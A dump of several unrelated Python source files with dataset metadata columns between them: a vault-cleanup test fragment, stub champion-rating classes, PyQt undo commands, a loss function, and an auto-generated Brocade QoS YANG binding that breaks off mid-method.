check_delta = base_age_date - datetime.datetime.utcfromtimestamp(
block.ref_modified)
if check_delta > self.manager.expire_age and block.ref_count == 0:
check_count = check_count + 1
self.assertEqual(vault_validate(self.deuce_client,
self.vault,
self.manager),
0)
self.assertEqual(vault_cleanup(self.deuce_client,
self.vault,
self.manager),
3)
| 40.527687
| 78
| 0.506269
| 1,101
| 12,442
| 5.436876
| 0.099001
| 0.053458
| 0.090879
| 0.083528
| 0.891914
| 0.891914
| 0.879886
| 0.879886
| 0.879719
| 0.879719
| 0
| 0.008713
| 0.428066
| 12,442
| 306
| 79
| 40.660131
| 0.83249
| 0.003858
| 0
| 0.880342
| 0
| 0
| 0.003875
| 0
| 0
| 0
| 0
| 0
| 0.042735
| 1
| 0.119658
| false
| 0
| 0.029915
| 0.08547
| 0.239316
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
aca52ef8c9ae0c046a4bc1b0e26f507f6db1f493
| 6,545
|
py
|
Python
|
loldib/getratings/models/NA/na_illaoi/na_illaoi_top.py
|
koliupy/loldib
|
c9ab94deb07213cdc42b5a7c26467cdafaf81b7f
|
[
"Apache-2.0"
] | null | null | null |
loldib/getratings/models/NA/na_illaoi/na_illaoi_top.py
|
koliupy/loldib
|
c9ab94deb07213cdc42b5a7c26467cdafaf81b7f
|
[
"Apache-2.0"
] | null | null | null |
loldib/getratings/models/NA/na_illaoi/na_illaoi_top.py
|
koliupy/loldib
|
c9ab94deb07213cdc42b5a7c26467cdafaf81b7f
|
[
"Apache-2.0"
] | null | null | null |
from getratings.models.ratings import Ratings
class NA_Illaoi_Top_Aatrox(Ratings):
pass
class NA_Illaoi_Top_Ahri(Ratings):
pass
class NA_Illaoi_Top_Akali(Ratings):
pass
class NA_Illaoi_Top_Alistar(Ratings):
pass
class NA_Illaoi_Top_Amumu(Ratings):
pass
class NA_Illaoi_Top_Anivia(Ratings):
pass
class NA_Illaoi_Top_Annie(Ratings):
pass
class NA_Illaoi_Top_Ashe(Ratings):
pass
class NA_Illaoi_Top_AurelionSol(Ratings):
pass
class NA_Illaoi_Top_Azir(Ratings):
pass
class NA_Illaoi_Top_Bard(Ratings):
pass
class NA_Illaoi_Top_Blitzcrank(Ratings):
pass
class NA_Illaoi_Top_Brand(Ratings):
pass
class NA_Illaoi_Top_Braum(Ratings):
pass
class NA_Illaoi_Top_Caitlyn(Ratings):
pass
class NA_Illaoi_Top_Camille(Ratings):
pass
class NA_Illaoi_Top_Cassiopeia(Ratings):
pass
class NA_Illaoi_Top_Chogath(Ratings):
pass
class NA_Illaoi_Top_Corki(Ratings):
pass
class NA_Illaoi_Top_Darius(Ratings):
pass
class NA_Illaoi_Top_Diana(Ratings):
pass
class NA_Illaoi_Top_Draven(Ratings):
pass
class NA_Illaoi_Top_DrMundo(Ratings):
pass
class NA_Illaoi_Top_Ekko(Ratings):
pass
class NA_Illaoi_Top_Elise(Ratings):
pass
class NA_Illaoi_Top_Evelynn(Ratings):
pass
class NA_Illaoi_Top_Ezreal(Ratings):
pass
class NA_Illaoi_Top_Fiddlesticks(Ratings):
pass
class NA_Illaoi_Top_Fiora(Ratings):
pass
class NA_Illaoi_Top_Fizz(Ratings):
pass
class NA_Illaoi_Top_Galio(Ratings):
pass
class NA_Illaoi_Top_Gangplank(Ratings):
pass
class NA_Illaoi_Top_Garen(Ratings):
pass
class NA_Illaoi_Top_Gnar(Ratings):
pass
class NA_Illaoi_Top_Gragas(Ratings):
pass
class NA_Illaoi_Top_Graves(Ratings):
pass
class NA_Illaoi_Top_Hecarim(Ratings):
pass
class NA_Illaoi_Top_Heimerdinger(Ratings):
pass
class NA_Illaoi_Top_Illaoi(Ratings):
pass
class NA_Illaoi_Top_Irelia(Ratings):
pass
class NA_Illaoi_Top_Ivern(Ratings):
pass
class NA_Illaoi_Top_Janna(Ratings):
pass
class NA_Illaoi_Top_JarvanIV(Ratings):
pass
class NA_Illaoi_Top_Jax(Ratings):
pass
class NA_Illaoi_Top_Jayce(Ratings):
pass
class NA_Illaoi_Top_Jhin(Ratings):
pass
class NA_Illaoi_Top_Jinx(Ratings):
pass
class NA_Illaoi_Top_Kalista(Ratings):
pass
class NA_Illaoi_Top_Karma(Ratings):
pass
class NA_Illaoi_Top_Karthus(Ratings):
pass
class NA_Illaoi_Top_Kassadin(Ratings):
pass
class NA_Illaoi_Top_Katarina(Ratings):
pass
class NA_Illaoi_Top_Kayle(Ratings):
pass
class NA_Illaoi_Top_Kayn(Ratings):
pass
class NA_Illaoi_Top_Kennen(Ratings):
pass
class NA_Illaoi_Top_Khazix(Ratings):
pass
class NA_Illaoi_Top_Kindred(Ratings):
pass
class NA_Illaoi_Top_Kled(Ratings):
pass
class NA_Illaoi_Top_KogMaw(Ratings):
pass
class NA_Illaoi_Top_Leblanc(Ratings):
pass
class NA_Illaoi_Top_LeeSin(Ratings):
pass
class NA_Illaoi_Top_Leona(Ratings):
pass
class NA_Illaoi_Top_Lissandra(Ratings):
pass
class NA_Illaoi_Top_Lucian(Ratings):
pass
class NA_Illaoi_Top_Lulu(Ratings):
pass
class NA_Illaoi_Top_Lux(Ratings):
pass
class NA_Illaoi_Top_Malphite(Ratings):
pass
class NA_Illaoi_Top_Malzahar(Ratings):
pass
class NA_Illaoi_Top_Maokai(Ratings):
pass
class NA_Illaoi_Top_MasterYi(Ratings):
pass
class NA_Illaoi_Top_MissFortune(Ratings):
pass
class NA_Illaoi_Top_MonkeyKing(Ratings):
pass
class NA_Illaoi_Top_Mordekaiser(Ratings):
pass
class NA_Illaoi_Top_Morgana(Ratings):
pass
class NA_Illaoi_Top_Nami(Ratings):
pass
class NA_Illaoi_Top_Nasus(Ratings):
pass
class NA_Illaoi_Top_Nautilus(Ratings):
pass
class NA_Illaoi_Top_Nidalee(Ratings):
pass
class NA_Illaoi_Top_Nocturne(Ratings):
pass
class NA_Illaoi_Top_Nunu(Ratings):
pass
class NA_Illaoi_Top_Olaf(Ratings):
pass
class NA_Illaoi_Top_Orianna(Ratings):
pass
class NA_Illaoi_Top_Ornn(Ratings):
pass
class NA_Illaoi_Top_Pantheon(Ratings):
pass
class NA_Illaoi_Top_Poppy(Ratings):
pass
class NA_Illaoi_Top_Quinn(Ratings):
pass
class NA_Illaoi_Top_Rakan(Ratings):
pass
class NA_Illaoi_Top_Rammus(Ratings):
pass
class NA_Illaoi_Top_RekSai(Ratings):
pass
class NA_Illaoi_Top_Renekton(Ratings):
pass
class NA_Illaoi_Top_Rengar(Ratings):
pass
class NA_Illaoi_Top_Riven(Ratings):
pass
class NA_Illaoi_Top_Rumble(Ratings):
pass
class NA_Illaoi_Top_Ryze(Ratings):
pass
class NA_Illaoi_Top_Sejuani(Ratings):
pass
class NA_Illaoi_Top_Shaco(Ratings):
pass
class NA_Illaoi_Top_Shen(Ratings):
pass
class NA_Illaoi_Top_Shyvana(Ratings):
pass
class NA_Illaoi_Top_Singed(Ratings):
pass
class NA_Illaoi_Top_Sion(Ratings):
pass
class NA_Illaoi_Top_Sivir(Ratings):
pass
class NA_Illaoi_Top_Skarner(Ratings):
pass
class NA_Illaoi_Top_Sona(Ratings):
pass
class NA_Illaoi_Top_Soraka(Ratings):
pass
class NA_Illaoi_Top_Swain(Ratings):
pass
class NA_Illaoi_Top_Syndra(Ratings):
pass
class NA_Illaoi_Top_TahmKench(Ratings):
pass
class NA_Illaoi_Top_Taliyah(Ratings):
pass
class NA_Illaoi_Top_Talon(Ratings):
pass
class NA_Illaoi_Top_Taric(Ratings):
pass
class NA_Illaoi_Top_Teemo(Ratings):
pass
class NA_Illaoi_Top_Thresh(Ratings):
pass
class NA_Illaoi_Top_Tristana(Ratings):
pass
class NA_Illaoi_Top_Trundle(Ratings):
pass
class NA_Illaoi_Top_Tryndamere(Ratings):
pass
class NA_Illaoi_Top_TwistedFate(Ratings):
pass
class NA_Illaoi_Top_Twitch(Ratings):
pass
class NA_Illaoi_Top_Udyr(Ratings):
pass
class NA_Illaoi_Top_Urgot(Ratings):
pass
class NA_Illaoi_Top_Varus(Ratings):
pass
class NA_Illaoi_Top_Vayne(Ratings):
pass
class NA_Illaoi_Top_Veigar(Ratings):
pass
class NA_Illaoi_Top_Velkoz(Ratings):
pass
class NA_Illaoi_Top_Vi(Ratings):
pass
class NA_Illaoi_Top_Viktor(Ratings):
pass
class NA_Illaoi_Top_Vladimir(Ratings):
pass
class NA_Illaoi_Top_Volibear(Ratings):
pass
class NA_Illaoi_Top_Warwick(Ratings):
pass
class NA_Illaoi_Top_Xayah(Ratings):
pass
class NA_Illaoi_Top_Xerath(Ratings):
pass
class NA_Illaoi_Top_XinZhao(Ratings):
pass
class NA_Illaoi_Top_Yasuo(Ratings):
pass
class NA_Illaoi_Top_Yorick(Ratings):
pass
class NA_Illaoi_Top_Zac(Ratings):
pass
class NA_Illaoi_Top_Zed(Ratings):
pass
class NA_Illaoi_Top_Ziggs(Ratings):
pass
class NA_Illaoi_Top_Zilean(Ratings):
pass
class NA_Illaoi_Top_Zyra(Ratings):
pass
| 15.695444
| 46
| 0.766692
| 972
| 6,545
| 4.736626
| 0.151235
| 0.209818
| 0.389661
| 0.479583
| 0.803432
| 0.803432
| 0
| 0
| 0
| 0
| 0
| 0
| 0.169748
| 6,545
| 416
| 47
| 15.733173
| 0.847258
| 0
| 0
| 0.498195
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0.498195
| 0.00361
| 0
| 0.501805
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
|
0
| 7
|
aca939736eb1c9c472b35974ea5a3c5ecf467008
| 3,133
|
py
|
Python
|
Rota_System/UI/Events/command_event_list.py
|
ergoregion/Rota-Program
|
44dab4cb11add184619d88aa0fcab61532d128e6
|
[
"MIT"
] | null | null | null |
Rota_System/UI/Events/command_event_list.py
|
ergoregion/Rota-Program
|
44dab4cb11add184619d88aa0fcab61532d128e6
|
[
"MIT"
] | null | null | null |
Rota_System/UI/Events/command_event_list.py
|
ergoregion/Rota-Program
|
44dab4cb11add184619d88aa0fcab61532d128e6
|
[
"MIT"
] | null | null | null |
__author__ = 'Neil Butcher'
from PyQt4 import QtGui
class CommandAddTemplate(QtGui.QUndoCommand):
def __init__(self, model, row, parent):
super(CommandAddTemplate, self).__init__('Added a new template')
self.model = model
self.row = row
self.parent = parent
self.template = model.new_template()
def redo(self):
self.model.beginInsertRows(self.parent, self.row, self.row)
self.model.templates.insert(self.row, self.template)
self.template.nameChanged.connect(self.model._templateNameChanged)
self.model.endInsertRows()
def undo(self):
self.model.beginRemoveRows(self.parent, self.row, self.row)
self.model.templates.pop(self.row)
self.template.nameChanged.disconnect(self.model._templateNameChanged)
self.model.endRemoveRows()
class CommandRemoveTemplate(QtGui.QUndoCommand):
def __init__(self, model, row, parent):
super(CommandRemoveTemplate, self).__init__('Removed a template')
self.model = model
self.row = row
self.parent = parent
self.template = model.templates[row]
def undo(self):
self.model.beginInsertRows(self.parent, self.row, self.row)
self.model.templates.insert(self.row, self.template)
self.template.nameChanged.connect(self.model._templateNameChanged)
self.model.endInsertRows()
def redo(self):
self.model.beginRemoveRows(self.parent, self.row, self.row)
self.model.templates.pop(self.row)
self.template.nameChanged.disconnect(self.model._templateNameChanged)
self.model.endRemoveRows()
class CommandAddEvent(QtGui.QUndoCommand):
def __init__(self, model, row, parent):
super(CommandAddEvent, self).__init__('Added a new event')
self.model = model
self.row = row
self.parent = parent
self.event = model.new_event()
def redo(self):
self.model.beginInsertRows(self.parent, self.row, self.row)
self.model.events.insert(self.row, self.event)
self.event.changed.connect(self.model._eventChanged)
self.model.endInsertRows()
def undo(self):
self.model.beginRemoveRows(self.parent, self.row, self.row)
self.model.events.pop(self.row)
self.event.changed.disconnect(self.model._eventChanged)
self.model.endRemoveRows()
class CommandRemoveEvent(QtGui.QUndoCommand):
def __init__(self, model, row, parent):
super(CommandRemoveEvent, self).__init__('Removed a event')
self.model = model
self.row = row
self.parent = parent
self.event = model.objects(row)
def undo(self):
self.model.beginInsertRows(self.parent, self.row, self.row)
self.model.events.insert(self.row, self.event)
self.event.changed.connect(self.model._eventChanged)
self.model.endInsertRows()
def redo(self):
self.model.beginRemoveRows(self.parent, self.row, self.row)
self.model.events.pop(self.row)
self.event.changed.disconnect(self.model._eventChanged)
self.model.endRemoveRows()
| 36.011494
| 77
| 0.677944
| 365
| 3,133
| 5.693151
| 0.117808
| 0.173244
| 0.127045
| 0.065448
| 0.875842
| 0.85948
| 0.85948
| 0.85948
| 0.85948
| 0.769009
| 0
| 0.000403
| 0.207469
| 3,133
| 87
| 78
| 36.011494
| 0.836488
| 0
| 0
| 0.8
| 0
| 0
| 0.026165
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.171429
| false
| 0
| 0.014286
| 0
| 0.242857
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
4a13a093341e5366e2db3c0f54ff6020f738abda
| 91
|
py
|
Python
|
models/loss.py
|
APikielny/mannequinchallenge
|
686ec20d86210005f1481a2f7c179ccba48636c5
|
[
"Apache-2.0"
] | 1
|
2022-02-18T17:09:25.000Z
|
2022-02-18T17:09:25.000Z
|
models/loss.py
|
APikielny/mannequinchallenge
|
686ec20d86210005f1481a2f7c179ccba48636c5
|
[
"Apache-2.0"
] | null | null | null |
models/loss.py
|
APikielny/mannequinchallenge
|
686ec20d86210005f1481a2f7c179ccba48636c5
|
[
"Apache-2.0"
] | null | null | null |
import torch
def L2(latent_1, latent_2):
return torch.mean((latent_1 - latent_2) ** 2)
| 22.75
| 49
| 0.703297
| 16
| 91
| 3.75
| 0.5625
| 0.233333
| 0.433333
| 0.466667
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.078947
| 0.164835
| 91
| 4
| 49
| 22.75
| 0.710526
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| false
| 0
| 0.333333
| 0.333333
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 1
| 1
| 0
|
0
| 9
|
4a21ad754bfcacfcac9876c1293c359869191fb9
| 38,085
|
py
|
Python
|
pybind/slxos/v16r_1_00b/qos/map_/__init__.py
|
shivharis/pybind
|
4e1c6d54b9fd722ccec25546ba2413d79ce337e6
|
[
"Apache-2.0"
] | null | null | null |
pybind/slxos/v16r_1_00b/qos/map_/__init__.py
|
shivharis/pybind
|
4e1c6d54b9fd722ccec25546ba2413d79ce337e6
|
[
"Apache-2.0"
] | null | null | null |
pybind/slxos/v16r_1_00b/qos/map_/__init__.py
|
shivharis/pybind
|
4e1c6d54b9fd722ccec25546ba2413d79ce337e6
|
[
"Apache-2.0"
] | 1
|
2021-11-05T22:15:42.000Z
|
2021-11-05T22:15:42.000Z
|
from operator import attrgetter
import pyangbind.lib.xpathhelper as xpathhelper
from pyangbind.lib.yangtypes import RestrictedPrecisionDecimalType, RestrictedClassType, TypedListType
from pyangbind.lib.yangtypes import YANGBool, YANGListType, YANGDynClass, ReferenceType
from pyangbind.lib.base import PybindBase
from decimal import Decimal
from bitarray import bitarray
import __builtin__
import cos_mutation
import cos_traffic_class
import traffic_class_cos
import dscp_mutation
import dscp_traffic_class
import dscp_cos
class map_(PybindBase):
"""
This class was auto-generated by the PythonClass plugin for PYANG
from YANG module brocade-qos-mls - based on the path /qos/map. Each member element of
the container is represented as a class variable - with a specific
YANG type.
"""
__slots__ = ('_pybind_generated_by', '_path_helper', '_yang_name', '_rest_name', '_extmethods', '__cos_mutation','__cos_traffic_class','__traffic_class_cos','__dscp_mutation','__dscp_traffic_class','__dscp_cos',)
_yang_name = 'map'
_rest_name = 'map'
_pybind_generated_by = 'container'
def __init__(self, *args, **kwargs):
path_helper_ = kwargs.pop("path_helper", None)
if path_helper_ is False:
self._path_helper = False
elif path_helper_ is not None and isinstance(path_helper_, xpathhelper.YANGPathHelper):
self._path_helper = path_helper_
elif hasattr(self, "_parent"):
path_helper_ = getattr(self._parent, "_path_helper", False)
self._path_helper = path_helper_
else:
self._path_helper = False
extmethods = kwargs.pop("extmethods", None)
if extmethods is False:
self._extmethods = False
elif extmethods is not None and isinstance(extmethods, dict):
self._extmethods = extmethods
elif hasattr(self, "_parent"):
extmethods = getattr(self._parent, "_extmethods", None)
self._extmethods = extmethods
else:
self._extmethods = False
self.__cos_mutation = YANGDynClass(base=YANGListType("name",cos_mutation.cos_mutation, yang_name="cos-mutation", rest_name="cos-mutation", parent=self, is_container='list', user_ordered=False, path_helper=self._path_helper, yang_keys='name', extensions={u'tailf-common': {u'info': u'Configure CoS-Mutation map', u'cli-no-key-completion': None, u'cli-full-no': None, u'cli-suppress-list-no': None, u'cli-suppress-key-abbreviation': None, u'cli-full-command': None, u'callpoint': u'cos_mutation', u'cli-mode-name': u'cos-mutation-$(name)'}}), is_container='list', yang_name="cos-mutation", rest_name="cos-mutation", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Configure CoS-Mutation map', u'cli-no-key-completion': None, u'cli-full-no': None, u'cli-suppress-list-no': None, u'cli-suppress-key-abbreviation': None, u'cli-full-command': None, u'callpoint': u'cos_mutation', u'cli-mode-name': u'cos-mutation-$(name)'}}, namespace='urn:brocade.com:mgmt:brocade-qos-mls', defining_module='brocade-qos-mls', yang_type='list', is_config=True)
self.__traffic_class_cos = YANGDynClass(base=YANGListType("traffic_class_cos_map_name",traffic_class_cos.traffic_class_cos, yang_name="traffic-class-cos", rest_name="traffic-class-cos", parent=self, is_container='list', user_ordered=False, path_helper=self._path_helper, yang_keys='traffic-class-cos-map-name', extensions={u'tailf-common': {u'info': u'Configure Traffic-Class-to-CoS map', u'cli-no-key-completion': None, u'cli-full-no': None, u'cli-suppress-list-no': None, u'cli-suppress-key-abbreviation': None, u'cli-full-command': None, u'callpoint': u'traffic_class_cos', u'cli-mode-name': u'traffic-class-cos-$(traffic-class-cos-map-name)'}}), is_container='list', yang_name="traffic-class-cos", rest_name="traffic-class-cos", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Configure Traffic-Class-to-CoS map', u'cli-no-key-completion': None, u'cli-full-no': None, u'cli-suppress-list-no': None, u'cli-suppress-key-abbreviation': None, u'cli-full-command': None, u'callpoint': u'traffic_class_cos', u'cli-mode-name': u'traffic-class-cos-$(traffic-class-cos-map-name)'}}, namespace='urn:brocade.com:mgmt:brocade-qos-mls', defining_module='brocade-qos-mls', yang_type='list', is_config=True)
self.__dscp_mutation = YANGDynClass(base=YANGListType("dscp_mutation_map_name",dscp_mutation.dscp_mutation, yang_name="dscp-mutation", rest_name="dscp-mutation", parent=self, is_container='list', user_ordered=False, path_helper=self._path_helper, yang_keys='dscp-mutation-map-name', extensions={u'tailf-common': {u'info': u'Configure DSCP-Mutation map', u'cli-no-key-completion': None, u'cli-suppress-list-no': None, u'cli-suppress-key-abbreviation': None, u'cli-full-command': None, u'callpoint': u'dscp_mutation', u'cli-mode-name': u'dscp-mutation-$(dscp-mutation-map-name)'}}), is_container='list', yang_name="dscp-mutation", rest_name="dscp-mutation", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Configure DSCP-Mutation map', u'cli-no-key-completion': None, u'cli-suppress-list-no': None, u'cli-suppress-key-abbreviation': None, u'cli-full-command': None, u'callpoint': u'dscp_mutation', u'cli-mode-name': u'dscp-mutation-$(dscp-mutation-map-name)'}}, namespace='urn:brocade.com:mgmt:brocade-qos-mls', defining_module='brocade-qos-mls', yang_type='list', is_config=True)
self.__dscp_traffic_class = YANGDynClass(base=YANGListType("dscp_traffic_class_map_name",dscp_traffic_class.dscp_traffic_class, yang_name="dscp-traffic-class", rest_name="dscp-traffic-class", parent=self, is_container='list', user_ordered=False, path_helper=self._path_helper, yang_keys='dscp-traffic-class-map-name', extensions={u'tailf-common': {u'info': u'Configure DSCP-to-Traffic-Class map', u'cli-no-key-completion': None, u'cli-suppress-list-no': None, u'cli-suppress-key-abbreviation': None, u'cli-full-command': None, u'callpoint': u'dscp_traffic_class', u'cli-mode-name': u'dscp-traffic-class-$(dscp-traffic-class-map-name)'}}), is_container='list', yang_name="dscp-traffic-class", rest_name="dscp-traffic-class", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Configure DSCP-to-Traffic-Class map', u'cli-no-key-completion': None, u'cli-suppress-list-no': None, u'cli-suppress-key-abbreviation': None, u'cli-full-command': None, u'callpoint': u'dscp_traffic_class', u'cli-mode-name': u'dscp-traffic-class-$(dscp-traffic-class-map-name)'}}, namespace='urn:brocade.com:mgmt:brocade-qos-mls', defining_module='brocade-qos-mls', yang_type='list', is_config=True)
self.__cos_traffic_class = YANGDynClass(base=YANGListType("name",cos_traffic_class.cos_traffic_class, yang_name="cos-traffic-class", rest_name="cos-traffic-class", parent=self, is_container='list', user_ordered=False, path_helper=self._path_helper, yang_keys='name', extensions={u'tailf-common': {u'info': u'Configure CoS-to-Traffic-Class map', u'cli-no-key-completion': None, u'cli-full-no': None, u'cli-suppress-list-no': None, u'cli-suppress-key-abbreviation': None, u'cli-full-command': None, u'callpoint': u'cos_traffic_class', u'cli-mode-name': u'cos-traffic-class-$(name)'}}), is_container='list', yang_name="cos-traffic-class", rest_name="cos-traffic-class", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Configure CoS-to-Traffic-Class map', u'cli-no-key-completion': None, u'cli-full-no': None, u'cli-suppress-list-no': None, u'cli-suppress-key-abbreviation': None, u'cli-full-command': None, u'callpoint': u'cos_traffic_class', u'cli-mode-name': u'cos-traffic-class-$(name)'}}, namespace='urn:brocade.com:mgmt:brocade-qos-mls', defining_module='brocade-qos-mls', yang_type='list', is_config=True)
self.__dscp_cos = YANGDynClass(base=YANGListType("dscp_cos_map_name",dscp_cos.dscp_cos, yang_name="dscp-cos", rest_name="dscp-cos", parent=self, is_container='list', user_ordered=False, path_helper=self._path_helper, yang_keys='dscp-cos-map-name', extensions={u'tailf-common': {u'info': u'Configure DSCP-to-CoS map', u'cli-no-key-completion': None, u'cli-suppress-list-no': None, u'cli-suppress-key-abbreviation': None, u'cli-full-command': None, u'callpoint': u'dscp_cos', u'cli-mode-name': u'dscp-cos-$(dscp-cos-map-name)'}}), is_container='list', yang_name="dscp-cos", rest_name="dscp-cos", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Configure DSCP-to-CoS map', u'cli-no-key-completion': None, u'cli-suppress-list-no': None, u'cli-suppress-key-abbreviation': None, u'cli-full-command': None, u'callpoint': u'dscp_cos', u'cli-mode-name': u'dscp-cos-$(dscp-cos-map-name)'}}, namespace='urn:brocade.com:mgmt:brocade-qos-mls', defining_module='brocade-qos-mls', yang_type='list', is_config=True)
load = kwargs.pop("load", None)
if args:
if len(args) > 1:
raise TypeError("cannot create a YANG container with >1 argument")
all_attr = True
for e in self._pyangbind_elements:
if not hasattr(args[0], e):
all_attr = False
break
if not all_attr:
raise ValueError("Supplied object did not have the correct attributes")
for e in self._pyangbind_elements:
nobj = getattr(args[0], e)
if nobj._changed() is False:
continue
setmethod = getattr(self, "_set_%s" % e)
if load is None:
setmethod(getattr(args[0], e))
else:
setmethod(getattr(args[0], e), load=load)
def _path(self):
if hasattr(self, "_parent"):
return self._parent._path()+[self._yang_name]
else:
return [u'qos', u'map']
def _rest_path(self):
if hasattr(self, "_parent"):
if self._rest_name:
return self._parent._rest_path()+[self._rest_name]
else:
return self._parent._rest_path()
else:
return [u'qos', u'map']
def _get_cos_mutation(self):
"""
Getter method for cos_mutation, mapped from YANG variable /qos/map/cos_mutation (list)
"""
return self.__cos_mutation
def _set_cos_mutation(self, v, load=False):
"""
Setter method for cos_mutation, mapped from YANG variable /qos/map/cos_mutation (list)
If this variable is read-only (config: false) in the
source YANG file, then _set_cos_mutation is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_cos_mutation() directly.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=YANGListType("name",cos_mutation.cos_mutation, yang_name="cos-mutation", rest_name="cos-mutation", parent=self, is_container='list', user_ordered=False, path_helper=self._path_helper, yang_keys='name', extensions={u'tailf-common': {u'info': u'Configure CoS-Mutation map', u'cli-no-key-completion': None, u'cli-full-no': None, u'cli-suppress-list-no': None, u'cli-suppress-key-abbreviation': None, u'cli-full-command': None, u'callpoint': u'cos_mutation', u'cli-mode-name': u'cos-mutation-$(name)'}}), is_container='list', yang_name="cos-mutation", rest_name="cos-mutation", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Configure CoS-Mutation map', u'cli-no-key-completion': None, u'cli-full-no': None, u'cli-suppress-list-no': None, u'cli-suppress-key-abbreviation': None, u'cli-full-command': None, u'callpoint': u'cos_mutation', u'cli-mode-name': u'cos-mutation-$(name)'}}, namespace='urn:brocade.com:mgmt:brocade-qos-mls', defining_module='brocade-qos-mls', yang_type='list', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """cos_mutation must be of a type compatible with list""",
'defined-type': "list",
'generated-type': """YANGDynClass(base=YANGListType("name",cos_mutation.cos_mutation, yang_name="cos-mutation", rest_name="cos-mutation", parent=self, is_container='list', user_ordered=False, path_helper=self._path_helper, yang_keys='name', extensions={u'tailf-common': {u'info': u'Configure CoS-Mutation map', u'cli-no-key-completion': None, u'cli-full-no': None, u'cli-suppress-list-no': None, u'cli-suppress-key-abbreviation': None, u'cli-full-command': None, u'callpoint': u'cos_mutation', u'cli-mode-name': u'cos-mutation-$(name)'}}), is_container='list', yang_name="cos-mutation", rest_name="cos-mutation", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Configure CoS-Mutation map', u'cli-no-key-completion': None, u'cli-full-no': None, u'cli-suppress-list-no': None, u'cli-suppress-key-abbreviation': None, u'cli-full-command': None, u'callpoint': u'cos_mutation', u'cli-mode-name': u'cos-mutation-$(name)'}}, namespace='urn:brocade.com:mgmt:brocade-qos-mls', defining_module='brocade-qos-mls', yang_type='list', is_config=True)""",
})
self.__cos_mutation = t
if hasattr(self, '_set'):
self._set()
def _unset_cos_mutation(self):
self.__cos_mutation = YANGDynClass(base=YANGListType("name",cos_mutation.cos_mutation, yang_name="cos-mutation", rest_name="cos-mutation", parent=self, is_container='list', user_ordered=False, path_helper=self._path_helper, yang_keys='name', extensions={u'tailf-common': {u'info': u'Configure CoS-Mutation map', u'cli-no-key-completion': None, u'cli-full-no': None, u'cli-suppress-list-no': None, u'cli-suppress-key-abbreviation': None, u'cli-full-command': None, u'callpoint': u'cos_mutation', u'cli-mode-name': u'cos-mutation-$(name)'}}), is_container='list', yang_name="cos-mutation", rest_name="cos-mutation", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Configure CoS-Mutation map', u'cli-no-key-completion': None, u'cli-full-no': None, u'cli-suppress-list-no': None, u'cli-suppress-key-abbreviation': None, u'cli-full-command': None, u'callpoint': u'cos_mutation', u'cli-mode-name': u'cos-mutation-$(name)'}}, namespace='urn:brocade.com:mgmt:brocade-qos-mls', defining_module='brocade-qos-mls', yang_type='list', is_config=True)
def _get_cos_traffic_class(self):
"""
Getter method for cos_traffic_class, mapped from YANG variable /qos/map/cos_traffic_class (list)
"""
return self.__cos_traffic_class
def _set_cos_traffic_class(self, v, load=False):
"""
Setter method for cos_traffic_class, mapped from YANG variable /qos/map/cos_traffic_class (list)
If this variable is read-only (config: false) in the
source YANG file, then _set_cos_traffic_class is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_cos_traffic_class() directly.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
